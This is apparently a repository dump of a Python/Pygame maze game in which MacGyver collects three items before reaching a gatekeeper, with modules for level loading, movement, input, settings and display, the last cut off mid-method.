"num_lines": 25, "path": "/homeautomation/door.py", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport RPi.GPIO as gpio\nimport time\nimport sys\n\ngpio.setmode(gpio.BOARD)\ngpio.setup(12, gpio.OUT, initial=1)\ngpio.setup(13, gpio.IN, pull_up_down=gpio.PUD_UP)\n\nif len(sys.argv) > 1 and sys.argv[1] == \"trigger\":\n gpio.output(12, 0)\n time.sleep(.1)\n gpio.output(12, 1)\nelif len(sys.argv) > 1 and sys.argv[1] == \"close\":\n while gpio.input(13) != 0:\n gpio.output(12, 0)\n time.sleep(.1)\n gpio.output(12, 1)\n time.sleep(15)\nelif len(sys.argv) > 1 and sys.argv[1] == \"get\":\n time.sleep(0.1)\n\nprint(\"False\" if gpio.input(13) else \"True\")\n\ngpio.cleanup(12)\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 21.636363983154297, "blob_id": "242eb8a2a08cd5fa6072af67e7b27375522880ac", "content_id": "d5961174e6feb2eab4d0a7c8ab07948f667062fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 249, "license_type": "no_license", "max_line_length": 54, "num_lines": 11, "path": "/Makefile", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "TEST_PILLAR_ROOT := pillar\nTEST_LOG_FILE := /dev/null\nTEST_CONFIG_DIR := testing/\n\n.PHONY: test\n\ntest:\n\tsalt-call --local --pillar-root ${TEST_PILLAR_ROOT} \\\n\t\t--log-file ${TEST_LOG_FILE} \\\n\t\t--config-dir=${TEST_CONFIG_DIR} \\\n\t\tstate.show_highstate\n" }, { "alpha_fraction": 0.6235294342041016, "alphanum_fraction": 0.6882352828979492, "avg_line_length": 20.25, "blob_id": "eaad203ec0fcc1976666d20df30a4602d185a1bc", "content_id": 
"4160de9d58df6f10208f3751b1ad5f884b3d4434", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 170, "license_type": "no_license", "max_line_length": 74, "num_lines": 8, "path": "/asterisk/scripts/eight.py", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport random\nimport sign\nimport os\n\ndisplay = sign.Sign(\"dash\", 8800)\n\ndisplay.new_message(\"8 8 8 8\", name=\"eight\", lifetime=1, priority=1)\n" }, { "alpha_fraction": 0.800000011920929, "alphanum_fraction": 0.800000011920929, "avg_line_length": 16.5, "blob_id": "75f66ca02d6964e5e1c6efeea32d13efb16ad848", "content_id": "1989845aa20ff9435385d892e32aa9f5b7f63107", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 105, "license_type": "no_license", "max_line_length": 48, "num_lines": 6, "path": "/router/reload.sh", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/bin/vbash\nsource /opt/vyatta/etc/functions/script-template\n\nconfigure\nload /config/config.boot\ncommit\n" }, { "alpha_fraction": 0.541961133480072, "alphanum_fraction": 0.5618374347686768, "avg_line_length": 23.879121780395508, "blob_id": "a77181b265b29ee20770691cdf13be4297d6b139", "content_id": "cb7431a1ea6ef49076f3a467f4387e401490ce06", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2264, "license_type": "no_license", "max_line_length": 135, "num_lines": 91, "path": "/_modules/utils.py", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "from itertools import izip\nfrom copy import deepcopy\nimport re\nimport hashlib\n\ndef dict_to_dictlist(d):\n return [{k: v} for k, v in d.items()]\n\ndef dictlist_to_dict(l):\n res = {}\n for d in l:\n if len(d) != 1:\n raise ValueError(\"Not a dictlist!\")\n for k, v in d.items():\n res[k] = v\n return res\n\nNET_REMAP = {'ip': 'ip_address'}\ndef remap(k):\n if k in NET_REMAP:\n return NET_REMAP[k]\n return k\n\nNET_PARAMS = ['name', 'bridge', 'gw', 'ip', 'type', 'ip6', 'hwaddr', 'tag', 'model', 'macaddr']\nKEEP_ANYWAY = ['name', 'ip']\n\ndef filter_netparams(param_dictlist):\n return [{remap(k): v} for d in param_dictlist for k, v in d.items() if k not in NET_PARAMS or k in KEEP_ANYWAY]\n\ndef mknet(name='eth0', bridge='vmbr0', gw=None, ip=None, type='veth', **kwargs):\n if ip and '/' not in ip:\n ip += '/24'\n\n if gw:\n kwargs['gw'] = gw\n\n if ip and kwargs.get('technology') != 'qemu':\n kwargs['ip'] = ip\n\n kwargs.update({\n 'name': name,\n 'bridge': bridge,\n 'type': type\n })\n\n if kwargs.get('technology') == 'qemu':\n if 'name' in kwargs:\n del kwargs['name']\n\n del kwargs['type']\n\n model = kwargs.get('model', 'virtio')\n\n if 'hwaddr' in kwargs:\n kwargs['macaddr'] = kwargs['hwaddr']\n kwargs[model] = kwargs['hwaddr']\n del kwargs['hwaddr']\n\n return ','.join(['='.join((k,str(v))) for k, v in kwargs.items() if k in NET_PARAMS])\n\ndef is_list(obj):\n return isinstance(obj, list)\n\ndef is_dict(obj):\n return isinstance(obj, dict)\n\ndef is_ip(obj):\n return is_str(obj) and re.match('^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$', obj)\n\ndef is_str(obj):\n return isinstance(obj, str)\n\ndef is_int(obj):\n return isinstance(obj, int)\n\ndef grouped(iterable, n):\n return izip(*[iter(iterable)]*n)\n\ndef pairwise(l):\n return grouped(l, 2)\n\ndef exclude_keys(dic, *keys):\n return {k: v for k, v in 
dic.iteritems() if k not in keys}\n\ndef copy(dic):\n return deepcopy(dic)\n\ndef gen_mac(hostname):\n raw = '02' + hashlib.sha256(hostname).hexdigest().lower()[-10:]\n mac = ':'.join((a+b for a,b in pairwise(raw)))\n return mac\n" }, { "alpha_fraction": 0.5513513684272766, "alphanum_fraction": 0.5765765905380249, "avg_line_length": 20.346153259277344, "blob_id": "cba6d408a55227e76303feef9aad5ceec2ed3d9a", "content_id": "eb484bdafaff9c0de0eb1b6f87a5b0219b747ebf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 555, "license_type": "no_license", "max_line_length": 174, "num_lines": 26, "path": "/asterisk/scripts/make-call-context", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/bin/bash\nif [ \"$#\" -lt 3 ]; then\n echo \"Usage: $0 <destination> <context> <extension> [varname] [varval]\"\n exit 1\nfi\n\necho \"$0 $1 $2 $3\"\n\nif [ -z \"$4\" ]; then\n VAR=\"HACKAFENOOP\"\n VAL=\"NONE\"\nelse\n VAR=\"$4\"\n VAL=\"$5\"\nfi\n\n{\n cat <<EOF | sed \"s/_DEST_/$1/\" | sed \"s%_CONTEXT_%$2%\" | sed \"s%_EXTENSION_%$3%\" | sed \"s%_VARNAME_%$VAR%\" | sed \"s%_VARVAL_%$VAL%\" > /var/spool/asterisk/outgoing/call-$$\nChannel: SIP/_DEST_\nContext: _CONTEXT_\nExtension: _EXTENSION_\nPriority: 1\nSetVar: CHANNEL(language)=en\nSetVar: _VARNAME_=_VARVAL_\nEOF\n} &\n" } ]
29
Parean/sk_tel
https://github.com/Parean/sk_tel
d5ad132c22d3a0bd3db56c768568c78132ad7f9c
fde49a3325bb075a6f319be3618b434adf6b8263
8109d7e9779b97f6dbb9423b36b6550e24bbf095
refs/heads/master
2022-04-27T11:43:06.562977
2020-04-22T13:59:22
2020-04-22T14:11:58
257,479,351
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5297253727912903, "alphanum_fraction": 0.5397415161132812, "avg_line_length": 24.566524505615234, "blob_id": "b4d61b0e14a510542a9b62d113abf66a518d161e", "content_id": "d16473fccfd8d6d5848f48a1efe8b605fae84053", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6190, "license_type": "no_license", "max_line_length": 169, "num_lines": 233, "path": "/network.py", "repo_name": "Parean/sk_tel", "src_encoding": "UTF-8", "text": "import math\r\nimport os\r\nimport sys\r\nfrom enum import Enum\r\nfrom itertools import tee\r\nfrom random import sample\r\n\r\nimport matplotlib.pyplot as plt\r\nimport networkx as nx\r\nfrom mpi4py import MPI\r\n\r\n\r\ncomm = MPI.COMM_WORLD\r\nrank = comm.Get_rank()\r\nnumber_of_communicators = comm.Get_size() - 1\r\n\r\nALGORITHM_TAG = 1\r\nDRAWING_TAG = 2\r\nDELAY_TIME = 0.5\r\n\r\n\r\nclass State(Enum):\r\n active = 1\r\n passive = 2\r\n leader = 3\r\n loser = 4\r\n\r\n\r\nclass Error(Enum):\r\n invalid_number_of_arguments = \"invalid number of arguments \\nformat of command: mpiexec -n {num_of_processes} python network.py [random | from_file {/path/to/file}]\"\r\n invalid_number_of_communicators = \"invalid number of communicators\"\r\n invalid_mode = \"invalid mode \\nmode must be either random or from_file\"\r\n file_not_found = \"input file doesn't exist\"\r\n ci_is_not_an_int = \"%s is not an int\"\r\n ci_duplication = \"%s is already exists in the network\"\r\n\r\n\r\ndef pairwise(iterable):\r\n a, b = tee(iterable)\r\n next(b, None)\r\n\r\n return zip(a, b)\r\n\r\n\r\ndef generate_edges(vxs):\r\n edges = [(v1,v2) for v1, v2 in pairwise(vxs)]\r\n edges.append((vxs[number_of_communicators - 1], vxs[0]))\r\n \r\n return edges\r\n\r\n\r\ndef finish(msg, *args):\r\n print(msg.value % args, flush=True)\r\n comm.Abort()\r\n exit(1)\r\n\r\n\r\ndef get_pos(vxs):\r\n pos = {}\r\n radius = 20\r\n \r\n for i, v in enumerate(vxs):\r\n arc = 2 * math.pi * i / len(vxs)\r\n x = math.sin(arc) * radius\r\n y = math.cos(arc) * radius\r\n pos[v] = (x, y)\r\n\r\n return pos\r\n\r\n\r\ndef draw_network(vxs, pos, node_colors, labels):\r\n plt.clf()\r\n\r\n network = nx.DiGraph()\r\n network.add_edges_from(generate_edges(vxs))\r\n\r\n nx.draw_networkx_nodes(network, pos, node_color=node_colors, node_size=500)\r\n nx.draw_networkx_labels(network, pos, labels=labels)\r\n nx.draw_networkx_edges(network, pos)\r\n\r\n plt.draw()\r\n plt.pause(DELAY_TIME)\r\n\r\n\r\ndef dst(rank, number_of_communicators):\r\n if rank == number_of_communicators:\r\n return 1\r\n\r\n return rank + 1\r\n\r\n\r\ndef src(rank, number_of_communicators):\r\n if rank == 1:\r\n return number_of_communicators\r\n\r\n return rank - 1\r\n\r\n\r\ndef send_data_to_drawer(data):\r\n comm.send(data, dest=0, tag=DRAWING_TAG)\r\n\r\n\r\ndef send(next_node, algo_data, state_data):\r\n comm.send(algo_data, dest=next_node, tag=ALGORITHM_TAG)\r\n send_data_to_drawer(state_data)\r\n\r\n\r\ndef get_vxs(argv):\r\n vxs = []\r\n\r\n if len(argv) < 1:\r\n finish(Error.invalid_number_of_arguments)\r\n \r\n if argv[0] == 'from_file':\r\n if len(argv) != 2:\r\n finish(Error.invalid_number_of_arguments)\r\n \r\n if not os.path.exists(argv[1]):\r\n finish(Error.file_not_found)\r\n \r\n for line in open(argv[1]):\r\n if not line[:-1].isdecimal():\r\n finish(Error.ci_is_not_an_int, line[:-1])\r\n \r\n ci = int(line)\r\n if ci in vxs:\r\n finish(Error.ci_duplication, ci)\r\n \r\n vxs.append(ci)\r\n \r\n if len(vxs) != number_of_communicators:\r\n 
finish(Error.invalid_number_of_communicators)\r\n elif argv[0] == 'random':\r\n if len(argv) != 1:\r\n finish(Error.invalid_number_of_arguments)\r\n \r\n vxs = sample(range(1, 100), number_of_communicators)\r\n else:\r\n finish(Error.invalid_mode)\r\n\r\n return vxs\r\n\r\n\r\ndef drawer_worker(argv):\r\n vxs = get_vxs(argv)\r\n comm.bcast(vxs, root=0)\r\n \r\n passive_node_color = (0.9, 0, 0)\r\n active_node_color = (1, 1, 0.7)\r\n node_colors = [active_node_color for v in vxs]\r\n pos = get_pos(vxs)\r\n \r\n labels = {v: v for v in vxs}\r\n is_running = number_of_communicators > 1\r\n \r\n while is_running:\r\n draw_network(vxs, pos, node_colors, labels)\r\n \r\n for i, v in enumerate(vxs):\r\n src_communicator = i + 1\r\n data = comm.recv(source=src_communicator, tag=DRAWING_TAG)\r\n \r\n if 'need_stop' in data:\r\n is_running = False\r\n else:\r\n assert 'state' in data\r\n assert 'ci' in data\r\n \r\n if data['state'] == State.passive:\r\n node_colors[i] = passive_node_color\r\n labels[v] = data['ci']\r\n \r\n draw_network(vxs, pos, node_colors, labels)\r\n plt.show()\r\n \r\n\r\ndef communicator_worker():\r\n prev_node = src(rank, number_of_communicators)\r\n next_node = dst(rank, number_of_communicators)\r\n acn = -1\r\n\r\n vxs = comm.bcast(None, root=0)\r\n \r\n win = -1 if number_of_communicators > 1 else vxs[rank - 1]\r\n state_data = {'ci' : vxs[rank - 1], 'state' : State.active}\r\n \r\n while win == -1:\r\n if state_data['state'] == State.active:\r\n send(next_node, {'one' : state_data['ci']}, state_data)\r\n \r\n data = comm.recv(source=prev_node, tag=ALGORITHM_TAG)\r\n assert 'one' in data\r\n acn = data['one']\r\n \r\n if acn == state_data['ci']:\r\n send(next_node, {'small' : acn}, state_data)\r\n \r\n win = acn\r\n \r\n data = comm.recv(source=prev_node, tag=ALGORITHM_TAG)\r\n assert 'small' in data\r\n else:\r\n send(next_node, {'two' : acn}, state_data)\r\n \r\n data = comm.recv(source=prev_node, tag=ALGORITHM_TAG)\r\n assert 'two' in data\r\n \r\n if acn < state_data['ci'] and acn < data['two']:\r\n state_data['ci'] = acn\r\n else:\r\n state_data['state'] = State.passive\r\n else:\r\n data = comm.recv(source=prev_node, tag=ALGORITHM_TAG)\r\n win = data.get('small', win)\r\n send(next_node, data, state_data)\r\n \r\n if win == vxs[rank - 1]:\r\n state_data['state'] = State.leader\r\n else:\r\n state_data['state'] = State.loser\r\n \r\n send_data_to_drawer({'need_stop':True})\r\n\r\n\r\ndef simulate(*argv):\r\n if rank == 0:\r\n drawer_worker(argv)\r\n else:\r\n communicator_worker()\r\n\r\n\r\nif __name__ == '__main__':\r\n simulate(*sys.argv[1:])\r\n" }, { "alpha_fraction": 0.7096773982048035, "alphanum_fraction": 0.7096773982048035, "avg_line_length": 18.66666603088379, "blob_id": "f156b4f3a2816196f0c038169ac7a08daf8b5d54", "content_id": "a24b41daa89ab5e7701e70e29132ad9455babef8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 62, "license_type": "no_license", "max_line_length": 42, "num_lines": 3, "path": "/main.py", "repo_name": "Parean/sk_tel", "src_encoding": "UTF-8", "text": "import network\r\n\r\nnetwork.simulate('from_file', 'input.txt')\r\n" } ]
2
smtr42/P3_maze
https://github.com/smtr42/P3_maze
a1de4e699fc853f71c18830a013711b092243635
473d373df1372c1a5a4765852ab4cc60e4f5ecf3
a5f9c2e160ea8f9fc7476b33a70183dac1b76f46
refs/heads/master
2020-05-19T15:13:07.690529
2019-05-30T17:41:25
2019-05-30T17:41:25
185,080,319
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.5324331521987915, "alphanum_fraction": 0.5332274436950684, "avg_line_length": 29.959016799926758, "blob_id": "f77641c10b539958312abeba3d5f066ddb33729a", "content_id": "861327c17848c93e78d9a264ad7b535a1ad19d81", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3777, "license_type": "permissive", "max_line_length": 73, "num_lines": 122, "path": "/models/level.py", "repo_name": "smtr42/P3_maze", "src_encoding": "UTF-8", "text": "\"\"\"This module level will contain the Level class\nin order to create and manage the maze.\n\"\"\"\nimport settings\n\n\nclass Level:\n \"\"\"This class will manage everything about the maze itself.\"\"\"\n\n def __init__(self, filename):\n \"\"\"\n Args:\n filename (str): the path needed to load the file.\n Attributes:\n filename (str):the path needed to load the file.\n _paths (list): list of set for each place possible the\n player can move on freely.\n _player (list): initial coordinate of the player.\n _finish (list): the coordinate where the player win the\n game.\n _items (list): the coordinates where the items are placed.\n _wall (list): the coordinates where the walls are\n placed.\n _item_obj_position (dict): each item name has a\n corresponding position.\n \"\"\"\n self.filename = filename\n self._paths = []\n self._player = []\n self._finish = []\n self._items = []\n self._wall = []\n self._item_obj_position = {}\n self.load_txt()\n\n def __contains__(self, position):\n \"\"\"\n Args:\n position (obj): needed so we can use 'in' comparison over\n the level object.\n Return:\n return what asked for from the _paths attribute for\n comparison.\n \"\"\"\n return position in self._paths\n\n def load_txt(self):\n \"\"\"\n Load the data from the textfile and append each paths, player\n and finish position's coordinate into a list.\n Each line has coordinate \"x\".\n Each column has coordinate \"y\".\n Modifications will be made for pygame use in display.py.\n \"\"\"\n with open(self.filename, \"r\") as textfile:\n for x, line in enumerate(textfile):\n for y, col in enumerate(line):\n if col == settings.CHAR_PATH:\n self._paths.append((x, y))\n if col == settings.CHAR_FINISH:\n self._paths.append((x, y))\n self._finish.append((x, y))\n if col == settings.CHAR_PLAYER:\n self._player.append((x, y))\n self._paths.append((x, y))\n if col == settings.CHAR_WALL:\n self._wall.append((x, y))\n\n def __repr__(self):\n return f\"Paths : {self._paths}\\nPlayer : {self._player}\\n\" \\\n f\"Finish : {self._finish}\"\n\n @property\n def player_position(self):\n \"\"\"\n Getter that return the player position as a tuple.\n \"\"\"\n return self._player[0]\n\n @property\n def path_possibles(self):\n \"\"\"\n Getter that return all the walkable paths as a list.\n \"\"\"\n return list(self._paths)\n\n @property\n def get_finish_position(self):\n \"\"\"\n Getter that return the finish/gatekeeper position as a tuple.\n \"\"\"\n return self._finish[0]\n\n @property\n def get_item_position(self):\n \"\"\"\n Getter that return the items position as a list.\n \"\"\"\n return list(self._items)\n\n def set_player_position(self, x):\n self._player[0] = x\n\n def set_items_position(self, x):\n self._items = x\n\n @property\n def get_wall_positions(self):\n \"\"\"\n Getter that return the walls position as a list.\n \"\"\"\n return list(self._wall)\n\n @property\n def get_item_obj_position(self):\n \"\"\"\n Getter that return the item position linked to each item as dict.\n \"\"\"\n return 
self._item_obj_position\n\n def set_item_obj_position(self, x):\n self._item_obj_position = x\n" }, { "alpha_fraction": 0.5615491271018982, "alphanum_fraction": 0.5633932948112488, "avg_line_length": 30.434782028198242, "blob_id": "e5378b912ddfc55220a616c1feb04a41e2bfd73f", "content_id": "160f8408c2072d1d177bac9135c3e4da6ae28229", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2169, "license_type": "permissive", "max_line_length": 72, "num_lines": 69, "path": "/models/position.py", "repo_name": "smtr42/P3_maze", "src_encoding": "UTF-8", "text": "\"\"\"This module will contain everything about the position :\ncalculations and checks, either for the player or the items.\"\"\"\n\n\nclass Position:\n \"\"\"This class will calculate every position\n according to the direction provided.\"\"\"\n\n def __init__(self, x, y):\n \"\"\" Args:\n x (int): refers to the line number.\n y (int): refers to the column number.\n Attributes:\n position (tuple): couple of coordinate from x and y.\"\"\"\n self.position = (x, y)\n\n def __repr__(self):\n return str(self.position)\n\n def __eq__(self, pos):\n \"\"\"This will enable the comparison between the attribute\n position of the class Position and other coordinates.\"\"\"\n return self.position == pos\n\n # def __hash__(self):\n # return hash(self.position)\n\n def __iter__(self):\n \"\"\"So the object returned can be transformed in a tuple or\n list, it must be an iterable. See player.move(direction) method.\n \"\"\"\n for i in self.position:\n yield i\n\n def up(self):\n \"\"\"Takes the position and calculate a new one according to the\n direction.\n Returns:\n the object Position itself with new coordinates\n \"\"\"\n x, y = self.position\n return self.__class__(x - 1, y)\n\n def down(self):\n \"\"\"Takes the position and calculate a new one according to the\n direction.\n Returns:\n the object Position itself with new coordinates\n \"\"\"\n x, y = self.position\n return self.__class__(x + 1, y)\n\n def right(self):\n \"\"\"Takes the position and calculate a new one according to the\n direction.\n Returns:\n the object Position itself with new coordinates\n \"\"\"\n x, y = self.position\n return self.__class__(x, y + 1)\n\n def left(self):\n \"\"\"Takes the position and calculate a new one according to the\n direction.\n Returns:\n the object Position itself with new coordinates\n \"\"\"\n x, y = self.position\n return self.__class__(x, y - 1)\n" }, { "alpha_fraction": 0.5672042965888977, "alphanum_fraction": 0.5752688050270081, "avg_line_length": 28.760000228881836, "blob_id": "f841a779f2aeb961cd139e4271427ca0a3649456", "content_id": "abd04ffa2651c1b5befa4bd8fa293dc1fe5765e6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 744, "license_type": "permissive", "max_line_length": 70, "num_lines": 25, "path": "/settings.py", "repo_name": "smtr42/P3_maze", "src_encoding": "UTF-8", "text": "\"\"\"\nThe settings used for configuration of the game\n\"\"\"\n\nCHAR_WALL = \"#\"\nCHAR_PATH = \"0\"\nCHAR_PLAYER = \"S\"\nCHAR_FINISH = \"F\"\n\n\nclass Settings:\n \"\"\"This is the settings class with no method\"\"\"\n def __init__(self):\n \"\"\"initialize the game's settings\n Attributes:\n item_created (int): the number of item created\n sprites_number (int): the number of sprites\n size_sprite (in): the size in pixel of each sprites of the\n game\n level_size (int): gives the size of a side of the screen.\n \"\"\"\n self.item_created 
= 3\n self.sprites_number = 15\n self.size_sprite = 32\n self.level_size = self.sprites_number * self.size_sprite\n" }, { "alpha_fraction": 0.4966592490673065, "alphanum_fraction": 0.4966592490673065, "avg_line_length": 28.933332443237305, "blob_id": "f93d8589d061729deffddca6ef0b4441b3a04f57", "content_id": "2a8f56f7b768858c6d1783e8c9221c32db102698", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 898, "license_type": "permissive", "max_line_length": 48, "num_lines": 30, "path": "/controllers/keyboard.py", "repo_name": "smtr42/P3_maze", "src_encoding": "UTF-8", "text": "\"\"\"Every input is taken care of and sent\nto the appropriate object\"\"\"\n\nimport sys\nimport pygame\n\n\nclass KeyboardInputs:\n \"\"\"\n Check the events with pygame\n \"\"\"\n def __init__(self, player):\n self.player = player\n\n def check_events(self):\n \"\"\"Respond to key presses.\"\"\"\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RIGHT:\n self.player.move(\"right\")\n if event.key == pygame.K_LEFT:\n self.player.move(\"left\")\n if event.key == pygame.K_UP:\n self.player.move(\"up\")\n if event.key == pygame.K_DOWN:\n self.player.move(\"down\")\n if event.key == pygame.K_ESCAPE:\n sys.exit()\n" }, { "alpha_fraction": 0.5800735354423523, "alphanum_fraction": 0.5810765624046326, "avg_line_length": 36.86075973510742, "blob_id": "e774f23bf4aff281d0816fba4333347fcfe8dd74", "content_id": "e26ed4e58c117a314574736d37fc99cf8e67b13f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2991, "license_type": "permissive", "max_line_length": 73, "num_lines": 79, "path": "/models/player.py", "repo_name": "smtr42/P3_maze", "src_encoding": "UTF-8", "text": "\"\"\"This class will take care of the player functions\"\"\"\nfrom .position import Position\n\n\nclass Player:\n \"\"\"\n Contains all the actions the player can make.\n \"\"\"\n\n def __init__(self, level, settings):\n \"\"\"\n Args:\n level (obj): instance of the Level class.\n settings (obj): instance of the settings class.\n Attributes:\n settings (obj): instance of the settings class.\n level (obj): instance of the Level class.\n item_obj_position (dict): each item name has a\n corresponding position.\n position (tuple): the coordinate of the player.\n gatekeeper_position (tuple): the finnish position.\n item_position (list): the item coordinates.\n victory_condition (bool): used to know if win or fail.\n item_counter (int): count every item picked up by the player.\n \"\"\"\n self.settings = settings\n self.level = level\n self.item_obj_position = self.level.get_item_obj_position\n self.position = self.level.player_position\n self.gatekeeper_position = self.level.get_finish_position\n self.item_position = []\n self.victory_condition = None\n self.item_counter = 0\n\n def move(self, direction):\n \"\"\"\n Action to modify the coordinate of the player according\n to a specified direction.\n Args:\n direction(str): the direction among 4 str possibles\n \"up\", \"down\", \"right\", \"left\".\n \"\"\"\n x, y = self.position\n new_position = getattr(Position(x, y), direction)()\n if new_position in self.level:\n # That's where the __contains__ method is useful in level.py\n self.position = tuple(new_position)\n self.level.set_player_position(self.position)\n\n def pickup_item(self):\n \"\"\"\n The method adding item to the counter and delete the 
ones\n picked up from the dict\n \"\"\"\n for item in self.item_obj_position.keys():\n # Comparing the player position to the items positions\n if self.item_obj_position.get(item) == self.position:\n del self.item_obj_position[item]\n self.item_counter += 1\n break\n\n # @property\n # def item_count(self):\n # \"\"\"\n # Getter that returns\n # \"\"\"\n # return self.settings.item_created - len(self.item_position)\n\n def check_victory_condition(self):\n \"\"\"\n Check the victory conditions and change the boolean\n victory_condition accordingly\n \"\"\"\n if self.position == self.gatekeeper_position \\\n and self.item_counter == self.settings.item_created:\n self.victory_condition = True\n elif self.position == self.gatekeeper_position \\\n and self.item_counter != self.settings.item_created:\n self.victory_condition = False\n" }, { "alpha_fraction": 0.6478190422058105, "alphanum_fraction": 0.6494345664978027, "avg_line_length": 24.26530647277832, "blob_id": "f75cc35f5b6128f45eb3b747ab95e7dbfc074511", "content_id": "86bf39f98f565008a66af41f7417b90bdf56ff08", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1238, "license_type": "permissive", "max_line_length": 47, "num_lines": 49, "path": "/core.py", "repo_name": "smtr42/P3_maze", "src_encoding": "UTF-8", "text": "\"\"\"Here the main game runs\"\"\"\nimport pygame\nfrom models.level import Level\nfrom models.position import Position\nfrom models.player import Player\nfrom models.item import Item\nfrom controllers.keyboard import KeyboardInputs\nfrom views.update import Update\nfrom settings import Settings\n\n\ndef run_game():\n \"\"\"\n The main function.\n Here we intanciate every class.\n Then runs the loop for the game to runs.\n \"\"\"\n # Pygame initialization.\n pygame.init()\n pygame.display.set_caption(\"McGyver\")\n\n # Instanciation.\n mcsettings = Settings()\n level = Level(\"models/map.txt\")\n item = Item(level)\n position = Position(1, 1)\n player = Player(level, mcsettings)\n chk_event = KeyboardInputs(player)\n updater = Update(mcsettings, level, player)\n\n updater.update_screen()\n\n running_state = True\n while running_state:\n chk_event.check_events()\n player.pickup_item()\n updater.update_player()\n updater.update_gatekeeper()\n updater.update_item()\n player.check_victory_condition()\n if updater.ending_display():\n continue\n else:\n while True:\n chk_event.check_events()\n\n\nif __name__ == \"__main__\":\n run_game()\n" }, { "alpha_fraction": 0.5720535516738892, "alphanum_fraction": 0.575527548789978, "avg_line_length": 38.65306091308594, "blob_id": "9eae478d67ec24c77d766fa0512e26c3430b7c9c", "content_id": "87d4a986d9244bc7773b4d9672ceaf84ddfb2f5e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7772, "license_type": "permissive", "max_line_length": 77, "num_lines": 196, "path": "/views/update.py", "repo_name": "smtr42/P3_maze", "src_encoding": "UTF-8", "text": "\"\"\"This is where everything is displayed.\"\"\"\nimport pygame\nimport os\n\n\nclass Update:\n \"\"\"\n This is the main class used to display.\n \"\"\"\n\n def __init__(self, settings, level, player):\n \"\"\"\n Args:\n settings (obj): instance of settings.\n level (obj): instance of level.\n player (obj): instance of player.\n\n Attributes:\n level (obj): instance of level.\n player (obj): instance of player.\n player_pos (tuple): the player position.\n gk_pos (tuple): the gate keeper position.\n wall_pos (list):the wall 
list of position.\n item_obj_position (dict): the dictionary item to position.\n settings (obj): settings instance.\n screen (pygame surface): the main screen object used.\n main_dir (str): used to give the main directory.\n data_dir (str): used to give the data directory.\n bg_image (pygame surface): the background image.\n bg_rect (pygame surface): the pygame rectangle from the image\n gk_image (pygame surface): the gatekeeper image.\n wall_image (pygame surface): the wall image.\n aiguille_image (pygame surface):the aiguille image.\n seringue_image (pygame surface):the seringue image.\n ether_image (pygame surface): the ether image.\n bbar_image (pygame surface):the bottom bar image.\n victory_image (pygame surface): the victory image.\n fail_image (pygame surface): the fail image.\n picked_position (list): the three positions for the item\n at the bottom of the screen for the picked up items.\n\n \"\"\"\n self.level = level\n self.player = player\n # RETRIEVE POSITIONS\n self.player_pos = self.level.player_position\n self.gk_pos = self.level.get_finish_position\n self.wall_pos = self.level.get_wall_positions\n self.item_obj_position = self.level.get_item_obj_position\n self.settings = settings\n\n # SCREEN\n self.screen = pygame.display.set_mode(\n (self.settings.level_size,\n self.settings.level_size + self.settings.size_sprite))\n self.main_dir = os.path.split(os.path.abspath(__file__))[0]\n self.data_dir = os.path.join(self.main_dir, 'data')\n\n # LOAD IMAGES\n self.bg_image = Update.load_image(self, 'background.jpg')\n self.bg_rect = self.bg_image.get_rect()\n self.player_image = Update.load_image(self, 'MacGyver.png')\n self.gk_image = Update.load_image(self, 'gatekeeper.png')\n self.wall_image = Update.load_image(self, 'wall.jpg')\n self.aiguille_image = Update.load_image(self, 'aiguille.png')\n self.seringue_image = Update.load_image(self, 'seringue.png')\n self.ether_image = Update.load_image(self, 'ether.png')\n self.bbar_image = Update.load_image(self, 'bottombar.png')\n self.victory_image = Update.load_image(self, 'victory.png')\n self.fail_image = Update.load_image(self, 'fail.png')\n\n self.picked_position = [(128, 480), (160, 480), (192, 480)]\n\n def update_screen(self):\n \"\"\"\n Display the background, the bottom black menu and the walls\n \"\"\"\n\n self.screen.blit(self.bg_image, self.bg_rect)\n self.screen.blit(self.bbar_image, (0, self.settings.level_size))\n for position in self.wall_pos:\n # We adapt the coordinates for pygame\n wall_y_pos, wall_x_pos = position\n wall_y_pos = wall_y_pos * self.settings.size_sprite\n wall_x_pos = wall_x_pos * self.settings.size_sprite\n self.screen.blit(self.wall_image, (wall_x_pos, wall_y_pos))\n\n def update_player(self):\n \"\"\"\n Update the player display when moving.\n \"\"\"\n if self.player_pos != self.level.player_position:\n # Reset the display to remove old position of player\n Update.update_screen(self)\n self.player_pos = self.level.player_position\n pg_y, pg_x = self.player_pos\n 